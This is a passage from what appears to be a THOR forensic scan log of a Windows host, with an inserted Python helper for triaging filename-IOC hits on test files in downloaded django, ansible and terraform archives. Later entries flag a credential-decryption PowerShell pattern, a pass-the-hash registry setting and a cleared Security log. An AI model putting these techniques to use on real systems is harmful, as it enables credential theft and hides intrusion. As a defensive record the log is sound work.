23212f7573722f62696e2f707974686f6e0a6672 / #!/usr/bin/python fr
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Mon Jul 29 01:24:54.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
Notice 19
Sep 10 12:29:14 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
50
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\terraform-main.zip\terraform-main\internal\lang\funcs\testdata\hello.tmpl
EXT:
.tmpl
TYPE:
UNKNOWN
SIZE:
15
FIRSTBYTES:
48656c6c6f2c20247b6e616d657d21 / Hello, ${name}!
MODIFIED:
Mon Jul 29 11:07:37.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\terraform-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
9103146
ARCHIVE_MD5: 1b21be3bad334b290996069e4162ada4
ARCHIVE_SHA1: 20037437fde7bd949d85a738583d415744d09b95
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f220fd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:25:20.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \hello.tmp
SUBSCORE_1:
50
REF_1:
RAT - https://twitter.com/obfusor/status/1538783112145928192
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
Notice 20
Sep 10 12:29:14 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
50
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\terraform-main.zip\terraform-main\internal\lang\testdata\functions-test\hello.tmpl
EXT:
.tmpl
TYPE:
UNKNOWN
SIZE:
15
FIRSTBYTES:
48656c6c6f2c20247b6e616d657d21 / Hello, ${name}!
MODIFIED:
Mon Jul 29 11:07:37.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\terraform-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
9103146
ARCHIVE_MD5: 1b21be3bad334b290996069e4162ada4
ARCHIVE_SHA1: 20037437fde7bd949d85a738583d415744d09b95
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f220fd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:25:20.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \hello.tmp
SUBSCORE_1:
50
REF_1:
RAT - https://twitter.com/obfusor/status/1538783112145928192
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 21
|
Sep 10 12:29:14 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
50
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\terraform-main.zip\terraform-main\internal\lang\testdata\functions-test\subdirectory\hello.tmpl
EXT:
.tmpl
TYPE:
UNKNOWN
SIZE:
15
FIRSTBYTES:
48656c6c6f2c20247b6e616d657d21 / Hello, ${name}!
MODIFIED:
Mon Jul 29 11:07:37.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\terraform-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
9103146
ARCHIVE_MD5: 1b21be3bad334b290996069e4162ada4
ARCHIVE_SHA1: 20037437fde7bd949d85a738583d415744d09b95
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f220fd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:25:20.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \hello.tmp
SUBSCORE_1:
50
REF_1:
RAT - https://twitter.com/obfusor/status/1538783112145928192
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 22
|
Sep 10 12:30:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\a.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 23
|
Sep 10 12:30:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\b.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 24
|
Sep 10 12:30:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\c\d.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 25
|
Sep 10 12:30:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\c\e.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 26
|
Sep 10 12:30:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\c\f\g.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 27
|
Sep 10 12:30:05 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\migrations\test_migrations_clashing_prefix\a.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
83
FIRSTBYTES:
66726f6d20646a616e676f2e646220696d706f72 / from django.db impor
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 28
|
Sep 10 12:31:09 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip\ansible-devel\.azure-pipelines\commands\i.sh
EXT:
.sh
TYPE:
UNIX SCRIPT
SIZE:
393
FIRSTBYTES:
23212f7573722f62696e2f656e7620626173680a / #!/usr/bin/env bash
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Tue Aug 6 16:22:44.712 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:44.934 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 29
|
Sep 10 12:31:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip\ansible-devel\test\integration\targets\module_precedence\lib_with_extension\a.py
EXT:
.py
TYPE:
UNIX SCRIPT
SIZE:
180
FIRSTBYTES:
23212f7573722f62696e2f707974686f6e0a6672 / #!/usr/bin/python fr
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Tue Aug 6 16:22:44.712 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:44.934 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 30
|
Sep 10 12:31:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip\ansible-devel\test\integration\targets\module_precedence\roles_with_extension\foo\library\a.py
EXT:
.py
TYPE:
UNIX SCRIPT
SIZE:
191
FIRSTBYTES:
23212f7573722f62696e2f707974686f6e0a6672 / #!/usr/bin/python fr
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Tue Aug 6 16:22:44.712 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:44.934 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 31
|
Sep 10 12:31:34 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
50
FILE:
E:\Users\j-taylor\Documents\DevOps Rep\terraform-main.zip\terraform-main\internal\lang\funcs\testdata\hello.tmpl
EXT:
.tmpl
TYPE:
UNKNOWN
SIZE:
15
FIRSTBYTES:
48656c6c6f2c20247b6e616d657d21 / Hello, ${name}!
MODIFIED:
Mon Jul 29 11:07:37.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\DevOps Rep\terraform-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
9103146
ARCHIVE_MD5: 1b21be3bad334b290996069e4162ada4
ARCHIVE_SHA1: 20037437fde7bd949d85a738583d415744d09b95
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f220fd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:46.731 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:47.216 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \hello.tmp
SUBSCORE_1:
50
REF_1:
RAT - https://twitter.com/obfusor/status/1538783112145928192
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 32
|
Sep 10 12:31:34 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
50
FILE:
E:\Users\j-taylor\Documents\DevOps Rep\terraform-main.zip\terraform-main\internal\lang\testdata\functions-test\hello.tmpl
EXT:
.tmpl
TYPE:
UNKNOWN
SIZE:
15
FIRSTBYTES:
48656c6c6f2c20247b6e616d657d21 / Hello, ${name}!
MODIFIED:
Mon Jul 29 11:07:37.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\DevOps Rep\terraform-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
9103146
ARCHIVE_MD5: 1b21be3bad334b290996069e4162ada4
ARCHIVE_SHA1: 20037437fde7bd949d85a738583d415744d09b95
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f220fd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:46.731 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:47.216 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \hello.tmp
SUBSCORE_1:
50
REF_1:
RAT - https://twitter.com/obfusor/status/1538783112145928192
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 33
|
Sep 10 12:31:34 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
50
FILE:
E:\Users\j-taylor\Documents\DevOps Rep\terraform-main.zip\terraform-main\internal\lang\testdata\functions-test\subdirectory\hello.tmpl
EXT:
.tmpl
TYPE:
UNKNOWN
SIZE:
15
FIRSTBYTES:
48656c6c6f2c20247b6e616d657d21 / Hello, ${name}!
MODIFIED:
Mon Jul 29 11:07:37.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\DevOps Rep\terraform-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
9103146
ARCHIVE_MD5: 1b21be3bad334b290996069e4162ada4
ARCHIVE_SHA1: 20037437fde7bd949d85a738583d415744d09b95
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f220fd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:46.731 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:47.216 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \hello.tmp
SUBSCORE_1:
50
REF_1:
RAT - https://twitter.com/obfusor/status/1538783112145928192
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
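Notices 19 to 33 are all archive members hit by the same two Filename IOCs quoted in their REASON_1 fields: the single-letter script regex `\\[\w]\.(sh|ps1|py|bat)$` and the string `\hello.tmp`. The following Python triage helper is an added example, not THOR's code or rules: it re-applies both IOCs to the paths copied from these notices and, as a heuristic of mine rather than anything THOR does, downgrades hits that sit inside a ZIP under a test or CI fixture directory. The `\hello.tmp` pattern is normalised here to the Python regex `\\hello\.tmp` (assumption: the leading backslash is a path separator); without a trailing `$` it also matches the prefix of Terraform's `hello.tmpl`, which is why those three 15-byte template files fire. One path (`C:\Users\Public\a.ps1`) is constructed and not from the report.

```python
import re
from dataclasses import dataclass

# Filename IOCs copied from the REASON_1 fields of the notices above. THOR
# reports them as patterns matched against the full path; they carry no
# implicit anchoring, so "\hello.tmp" is a prefix of "\hello.tmpl" as well.
# (The second pattern is normalised to a valid Python regex: assumption.)
FILENAME_IOCS = [
    (re.compile(r"\\[\w]\.(sh|ps1|py|bat)$"), "Suspicious Single Letter Script Names", 40),
    (re.compile(r"\\hello\.tmp"), "RAT - https://twitter.com/obfusor/status/1538783112145928192", 50),
]

# Heuristic of this example (not THOR's): a hit on a member of an archive whose
# path contains a test/fixture/CI directory is most likely vendored test data.
TEST_DIR_SEGMENTS = ("\\tests\\", "\\test\\", "\\testdata\\", "\\.azure-pipelines\\")
ARCHIVE_MARKER = re.compile(r"\.zip\\", re.IGNORECASE)


@dataclass
class Hit:
    path: str
    ref: str
    subscore: int
    likely_test_data: bool


def match_filename_iocs(path: str) -> list[Hit]:
    """Return one Hit per IOC whose pattern is found anywhere in the path."""
    in_archive = ARCHIVE_MARKER.search(path) is not None
    in_test_dir = any(seg in path for seg in TEST_DIR_SEGMENTS)
    return [
        Hit(path, ref, score, in_archive and in_test_dir)
        for rx, ref, score in FILENAME_IOCS
        if rx.search(path)
    ]


def triage(paths):
    """(path, ref, subscore, verdict) for every IOC match across the inputs."""
    out = []
    for p in paths:
        for h in match_filename_iocs(p):
            verdict = "likely test data" if h.likely_test_data else "review"
            out.append((h.path, h.ref, h.subscore, verdict))
    return out


# Paths copied from Notices 19-33, plus one constructed path (not from the
# report) showing a hit outside any archive, and one report path with no hit.
SAMPLE_PATHS = [
    r"E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\terraform-main.zip\terraform-main\internal\lang\funcs\testdata\hello.tmpl",
    r"E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\c\d.py",
    r"E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip\ansible-devel\.azure-pipelines\commands\i.sh",
    r"E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip\ansible-devel\test\integration\targets\module_precedence\lib_with_extension\a.py",
    r"E:\Users\j-taylor\Documents\DevOps Rep\terraform-main.zip\terraform-main\internal\lang\testdata\functions-test\hello.tmpl",
    r"C:\Users\Public\a.ps1",  # constructed: single-letter script dropped on disk, no archive
    r"E:\Windows\System32\WindowsPowerShell\v1.0\Modules\Carbon\Cryptography\Unprotect-String.ps1",  # no filename IOC hit
]

if __name__ == "__main__":
    for path, ref, score, verdict in triage(SAMPLE_PATHS):
        print(f"{score:>3}  {verdict:<17} {path}")
```

The two IOCs are deliberately cheap substring and suffix heuristics with low subscores (40 and 50), and every hit in Notices 19 to 33 lands inside one of three downloaded upstream repositories (django, ansible, terraform). The check worth doing before closing them is to confirm the archive contents match a fresh copy of the same upstream branch, since a planted file inside a vendored ZIP would carry the same low score; the constructed `a.ps1` outside any archive shows the case that should stay in the review queue.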
Notice 34
|
Sep 10 12:44:09 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
50
FILE:
E:\Windows\System32\WindowsPowerShell\v1.0\Modules\Carbon\Cryptography\Unprotect-String.ps1
EXT:
.ps1
TYPE:
UNKNOWN
SIZE:
2368
FIRSTBYTES:
2320436f70797269676874203230313220416172 / # Copyright 2012 Aar
CREATED:
Tue Jun 24 23:29:44.000 2014
MODIFIED:
Tue Jun 24 23:29:44.000 2014
ACCESSED:
Tue Jul 23 12:57:34.038 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule SUSP_PS_Unprotect_ProtectedData / Detects a suspicious Unprotect statement for ProtectedData in PowerShell code
SUBSCORE_1:
50
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2018-11-15
TAGS_1:
SCRIPT, SUSP, T1059, T1059_001
RULENAME_1: SUSP_PS_Unprotect_ProtectedData
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Notice 35
|
Sep 10 12:44:47 WIN-LRTT94FA08M/10.100.5.12
MODULE:
RegistryHive
MESSAGE:
Notable registry hive entries found
ENTRY:
ROOT\Microsoft\Windows\CurrentVersion\Policies\System;LocalAccountTokenFilterPolicy;1
SCORE:
55
PATH:
E:\Windows\System32\config\SOFTWARE
KEY:
ROOT\Microsoft\Windows\CurrentVersion\Policies\System
MODIFIED:
Tue Sep 3 12:20:55 2024
REASON_1:
YARA rule PTH_Weak_LocalAccountTokenFilterPolicy / Detects reg key allows all local admin group members to logon remotely with highest privileges
SUBSCORE_1:
55
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2017-03-16
TAGS_1:
REG, T1112, T1550_002
RULENAME_1: PTH_Weak_LocalAccountTokenFilterPolicy
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Notice 36
|
Sep 10 12:57:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Evil Event ID
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
1102
EVENT_LEVEL:
4
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 10:11:04 2024
DESC:
Security Log deleted
ENTRY:
